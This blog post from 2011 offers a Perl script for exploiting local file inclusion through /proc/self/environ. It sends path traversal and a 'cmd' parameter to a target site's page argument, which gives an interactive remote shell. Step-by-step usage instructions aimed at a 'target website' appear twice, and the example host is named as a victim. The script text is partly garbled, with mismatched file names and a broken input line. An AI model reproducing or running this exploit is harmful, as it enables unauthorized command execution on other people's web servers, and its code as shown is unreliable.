Thursday, March 17, 2011
Following script to run / execute LFI proc / elft / environ by simple in a shell.
How to use it is:
1. Install perl on your computer / target computer (be thankful if already installed)
2. Save the file above: "LFI.pl"
3. Then run the command: "perl FLI.pl www.targetwebsiteanda.com/index.php?page = \ n"
4. Wait for the results
Good luck & congratulations to explored!
#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
print "\n==========================================\n";
print " LFI Command Execution \n";
print "==========================================\n";
print "Usage: perl LFI.pl (without http:://)\n";
print "Ex. perl FLI.pl www.korban.com/index.php?page=\n";
exit;
}
$host=$ARGV[0];
$lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron";
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = );
while($cmd !~ "exit")
{
$content = "";
$ua = LWP::UserAgent->new();
$ua->agent('');
$request = HTTP::Request->new (GET => "http://".$host.$lfi."&cmd=".$cmd);
$response = $ua->request ($request);
$content = $response->content;
print $content."\n";
print "iDSc-shell# ";
chomp( $cmd = );
} How to use it is:
1. Install perl on your computer / target computer (be thankful if already installed)
2. Save the file above: "LFI.pl"
3. Then run the command: "perl FLI.pl www.targetwebsiteanda.com/index.php?page = \ n"
4. Wait for the results
Good luck & congratulations to explored!
hahaha lamer
ReplyDelete